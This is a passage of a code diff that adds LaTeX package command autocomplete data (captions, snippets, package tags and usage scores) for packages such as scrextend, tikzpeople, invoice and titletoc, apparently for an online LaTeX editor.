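+ //   const top = entries.slice().sort((a, b) => b.score - a.score)[0];
+ //   insertSnippet(top.snippet);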
tablefootnote: [ + { + caption: '\\tablefootnote{}', + snippet: '\\tablefootnote{$1}', + meta: 'tablefootnote-cmd', + score: 0.00017554048326570823, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'tablefootnote-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'tablefootnote-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'tablefootnote-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tablefootnote-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tablefootnote-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'tablefootnote-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'tablefootnote-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'tablefootnote-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'tablefootnote-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tablefootnote-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'tablefootnote-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'tablefootnote-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'tablefootnote-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'tablefootnote-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'tablefootnote-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'tablefootnote-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'tablefootnote-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'tablefootnote-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'tablefootnote-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tablefootnote-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tablefootnote-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tablefootnote-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tablefootnote-cmd', + score: 0.021170869458413965, + }, + ], + amstext: [ + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'amstext-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'amstext-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'amstext-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'amstext-cmd', + 
score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'amstext-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'amstext-cmd', + score: 0.0063276692758974925, + }, + ], + units: [ + { + caption: '\\unitfrac{}{}', + snippet: '\\unitfrac{$1}{$2}', + meta: 'units-cmd', + score: 0.0009264866770139672, + }, + { + caption: '\\unitfrac[]{}{}', + snippet: '\\unitfrac[$1]{$2}{$3}', + meta: 'units-cmd', + score: 0.0009264866770139672, + }, + { + caption: '\\unit[]{}', + snippet: '\\unit[$1]{$2}', + meta: 'units-cmd', + score: 0.028299796173135428, + }, + { + caption: '\\unit{}', + snippet: '\\unit{$1}', + meta: 'units-cmd', + score: 0.028299796173135428, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'units-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'units-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'units-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'units-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'units-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'units-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\nicefrac{}{}', + snippet: '\\nicefrac{$1}{$2}', + meta: 'units-cmd', + score: 0.0018011350423659288, + }, + ], + scrextend: [ + { + caption: '\\footref{}', + snippet: '\\footref{$1}', + meta: 'scrextend-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\footref', + snippet: '\\footref', + meta: 'scrextend-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\scriptsize', + snippet: '\\scriptsize', + meta: 'scrextend-cmd', + score: 0.05550618634921613, + }, + { + caption: '\\scriptsize{}', + snippet: '\\scriptsize{$1}', + meta: 'scrextend-cmd', + score: 0.05550618634921613, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'scrextend-cmd', + score: 0.7504160124360846, + }, + { + caption: '\\Large', + snippet: '\\Large', + meta: 'scrextend-cmd', + score: 0.1987771081149759, + }, + { + caption: '\\Large{}', + snippet: '\\Large{$1}', + meta: 'scrextend-cmd', + score: 0.1987771081149759, + }, + { + caption: '\\and', + snippet: '\\and', + meta: 'scrextend-cmd', + score: 0.09847866956528724, + }, + { + caption: '\\LARGE', + snippet: '\\LARGE', + meta: 'scrextend-cmd', + score: 0.05947642043953873, + }, + { + caption: '\\LARGE{}', + snippet: '\\LARGE{$1}', + meta: 'scrextend-cmd', + score: 0.05947642043953873, + }, + { + caption: '\\subtitle{}', + snippet: '\\subtitle{$1}', + meta: 'scrextend-cmd', + score: 0.01803265454797817, + }, + { + caption: '\\large', + snippet: '\\large', + meta: 'scrextend-cmd', + score: 0.20377416734108866, + }, + { + caption: '\\large{}', + snippet: '\\large{$1}', + meta: 'scrextend-cmd', + score: 0.20377416734108866, + }, + { + caption: '\\Huge', + snippet: '\\Huge', + meta: 'scrextend-cmd', + score: 0.04725806985998919, + }, + { + caption: '\\footnotesize', + snippet: '\\footnotesize', + meta: 'scrextend-cmd', + score: 0.2038592081252624, + }, + { + caption: '\\footnotesize{}', + snippet: '\\footnotesize{$1}', + meta: 'scrextend-cmd', + score: 0.2038592081252624, + }, + { + caption: '\\small', + snippet: '\\small', + meta: 'scrextend-cmd', + score: 
0.2447632045426295, + }, + { + caption: '\\small{}', + snippet: '\\small{$1}', + meta: 'scrextend-cmd', + score: 0.2447632045426295, + }, + { + caption: '\\huge', + snippet: '\\huge', + meta: 'scrextend-cmd', + score: 0.04229832859754922, + }, + { + caption: '\\huge{}', + snippet: '\\huge{$1}', + meta: 'scrextend-cmd', + score: 0.04229832859754922, + }, + { + caption: '\\cleardoublepage', + snippet: '\\cleardoublepage', + meta: 'scrextend-cmd', + score: 0.044016804142963585, + }, + { + caption: '\\tiny{}', + snippet: '\\tiny{$1}', + meta: 'scrextend-cmd', + score: 0.047727606910742924, + }, + { + caption: '\\tiny', + snippet: '\\tiny', + meta: 'scrextend-cmd', + score: 0.047727606910742924, + }, + { + caption: '\\deffootnote[]{}{}{}', + snippet: '\\deffootnote[$1]{$2}{$3}{$4}', + meta: 'scrextend-cmd', + score: 2.545393270896533e-5, + }, + { + caption: '\\thefootnote', + snippet: '\\thefootnote', + meta: 'scrextend-cmd', + score: 0.007676927812687567, + }, + { + caption: '\\thefootnote{}', + snippet: '\\thefootnote{$1}', + meta: 'scrextend-cmd', + score: 0.007676927812687567, + }, + { + caption: '\\normalsize', + snippet: '\\normalsize', + meta: 'scrextend-cmd', + score: 0.14261697855738878, + }, + { + caption: '\\normalsize{}', + snippet: '\\normalsize{$1}', + meta: 'scrextend-cmd', + score: 0.14261697855738878, + }, + { + caption: '\\titlefont', + snippet: '\\titlefont', + meta: 'scrextend-cmd', + score: 0.0005278519180709353, + }, + { + caption: '\\thefootnotemark', + snippet: '\\thefootnotemark', + meta: 'scrextend-cmd', + score: 2.545393270896533e-5, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'scrextend-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'scrextend-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\addtokomafont{}{}', + snippet: '\\addtokomafont{$1}{$2}', + meta: 'scrextend-cmd', + score: 0.0008555564394100388, + }, + { + caption: '\\setkomafont{}{}', + snippet: '\\setkomafont{$1}{$2}', + meta: 'scrextend-cmd', + score: 0.012985816912639263, + }, + { + caption: '\\KOMAoptions{}', + snippet: '\\KOMAoptions{$1}', + meta: 'scrextend-cmd', + score: 0.000396664302361659, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'scrextend-cmd', + score: 0.00037306820619479756, + }, + ], + mwe: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'mwe-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'mwe-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'mwe-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'mwe-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'mwe-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'mwe-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'mwe-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'mwe-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'mwe-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mwe-cmd', + score: 
0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'mwe-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'mwe-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'mwe-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'mwe-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'mwe-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'mwe-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'mwe-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'mwe-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'mwe-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mwe-cmd', + score: 0.008565354665444157, + }, + ], + beamerposter: [ + { + caption: '\\scriptsize', + snippet: '\\scriptsize', + meta: 'beamerposter-cmd', + score: 0.05550618634921613, + }, + { + caption: '\\scriptsize{}', + snippet: '\\scriptsize{$1}', + meta: 'beamerposter-cmd', + score: 0.05550618634921613, + }, + { + caption: '\\Large', + snippet: '\\Large', + meta: 'beamerposter-cmd', + score: 0.1987771081149759, + }, + { + caption: '\\Large{}', + snippet: '\\Large{$1}', + meta: 'beamerposter-cmd', + score: 0.1987771081149759, + }, + { + caption: '\\footnotesize', + snippet: '\\footnotesize', + meta: 'beamerposter-cmd', + score: 0.2038592081252624, + }, + { + caption: '\\footnotesize{}', + snippet: '\\footnotesize{$1}', + meta: 'beamerposter-cmd', + score: 0.2038592081252624, + }, + { + caption: '\\LARGE', + snippet: '\\LARGE', + meta: 'beamerposter-cmd', + score: 0.05947642043953873, + }, + { + caption: '\\LARGE{}', + snippet: '\\LARGE{$1}', + meta: 'beamerposter-cmd', + score: 0.05947642043953873, + }, + { + caption: '\\large', + snippet: '\\large', + meta: 'beamerposter-cmd', + score: 0.20377416734108866, + }, + { + caption: '\\large{}', + snippet: '\\large{$1}', + meta: 'beamerposter-cmd', + score: 0.20377416734108866, + }, + { + caption: '\\VeryHuge', + snippet: '\\VeryHuge', + meta: 'beamerposter-cmd', + score: 0.000892251826639951, + }, + { + caption: '\\small', + snippet: '\\small', + meta: 'beamerposter-cmd', + score: 0.2447632045426295, + }, + { + caption: '\\small{}', + snippet: '\\small{$1}', + meta: 'beamerposter-cmd', + score: 0.2447632045426295, + }, + { + caption: '\\VERYHuge', + snippet: '\\VERYHuge', + meta: 'beamerposter-cmd', + score: 0.0011668714784222325, + }, + { + caption: '\\veryHuge', + snippet: '\\veryHuge', + meta: 'beamerposter-cmd', + score: 0.000892251826639951, + }, + { + caption: '\\normalsize', + snippet: '\\normalsize', + meta: 'beamerposter-cmd', + score: 0.14261697855738878, + }, + { + caption: '\\normalsize{}', + snippet: '\\normalsize{$1}', + meta: 'beamerposter-cmd', + score: 0.14261697855738878, + }, + { + caption: '\\tiny{}', + snippet: '\\tiny{$1}', + meta: 'beamerposter-cmd', + score: 0.047727606910742924, + }, + { + caption: '\\tiny', + snippet: '\\tiny', + meta: 'beamerposter-cmd', + score: 0.047727606910742924, + }, + { + caption: 
'\\expandafter', + snippet: '\\expandafter', + meta: 'beamerposter-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'beamerposter-cmd', + score: 0.021170869458413965, + }, + ], + footnote: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'footnote-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'footnote-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\makesavenoteenv{}', + snippet: '\\makesavenoteenv{$1}', + meta: 'footnote-cmd', + score: 0.0018587414325895479, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'footnote-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'footnote-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\parbox{}{}', + snippet: '\\parbox{$1}{$2}', + meta: 'footnote-cmd', + score: 0.04800611019618169, + }, + ], + invoice: [ + { + caption: '\\Fee{}{}{}', + snippet: '\\Fee{$1}{$2}{$3}', + meta: 'invoice-cmd', + score: 0.003295435821387378, + }, + { + caption: '\\ProjectTitle{}', + snippet: '\\ProjectTitle{$1}', + meta: 'invoice-cmd', + score: 0.003295435821387378, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'invoice-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'invoice-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'invoice-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'invoice-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'invoice-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'invoice-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\endhead', + snippet: '\\endhead', + meta: 'invoice-cmd', + score: 0.0023853501147448834, + }, + { + caption: '\\endfoot', + snippet: '\\endfoot', + meta: 'invoice-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'invoice-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'invoice-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\nopagebreak', + snippet: '\\nopagebreak', + meta: 'invoice-cmd', + score: 9.952664522415981e-5, + }, + { + caption: '\\endfirsthead', + snippet: '\\endfirsthead', + meta: 'invoice-cmd', + score: 0.0016148498709822416, + }, + { + caption: '\\endlastfoot', + snippet: '\\endlastfoot', + meta: 'invoice-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'invoice-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\tablename', + snippet: '\\tablename', + meta: 'invoice-cmd', + score: 0.0029238994233674776, + }, + { + caption: '\\pagebreak', + snippet: '\\pagebreak', + meta: 'invoice-cmd', + score: 0.0313525090421608, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'invoice-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'invoice-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'invoice-cmd', + score: 0.354445763583904, + }, + { + caption: 
'\\expandafter', + snippet: '\\expandafter', + meta: 'invoice-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'invoice-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'invoice-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'invoice-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'invoice-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'invoice-cmd', + score: 0.028955796305270766, + }, + ], + tikzpeople: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzpeople-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'tikzpeople-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikzpeople-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikzpeople-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'tikzpeople-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'tikzpeople-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikzpeople-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikzpeople-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tikzpeople-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tikzpeople-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tikzpeople-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tikzpeople-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikzpeople-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tikzpeople-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzpeople-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tikzpeople-cmd', + score: 0.09973951908678011, + }, + 
{ + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikzpeople-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikzpeople-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tikzpeople-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikzpeople-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikzpeople-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'tikzpeople-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'tikzpeople-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'tikzpeople-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'tikzpeople-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'tikzpeople-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'tikzpeople-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'tikzpeople-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'tikzpeople-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'tikzpeople-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'tikzpeople-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'tikzpeople-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'tikzpeople-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'tikzpeople-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikzpeople-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'tikzpeople-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'tikzpeople-cmd', + score: 
0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'tikzpeople-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzpeople-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tikzpeople-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikzpeople-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikzpeople-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tikzpeople-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tikzpeople-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tikzpeople-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikzpeople-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tikzpeople-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzpeople-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tikzpeople-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tikzpeople-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tikzpeople-cmd', + score: 0.2864294797053033, + }, + ], + titletoc: [ + { + caption: '\\thecontentspage', + snippet: '\\thecontentspage', + meta: 'titletoc-cmd', + score: 0.0008054115902675176, + }, + { + caption: '\\startcontents', + snippet: '\\startcontents', + meta: 'titletoc-cmd', + score: 0.00026847053008917257, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'titletoc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'titletoc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\printcontents{}{}{}', + snippet: '\\printcontents{$1}{$2}{$3}', + meta: 'titletoc-cmd', + score: 0.00013423526504458629, + }, + { + caption: '\\titlecontents{}[]', + snippet: '\\titlecontents{$1}[$2]', + meta: 'titletoc-cmd', + score: 0.0017036290423289926, + }, + { + caption: '\\titlecontents{}[]{}{}{}{}[]', + snippet: 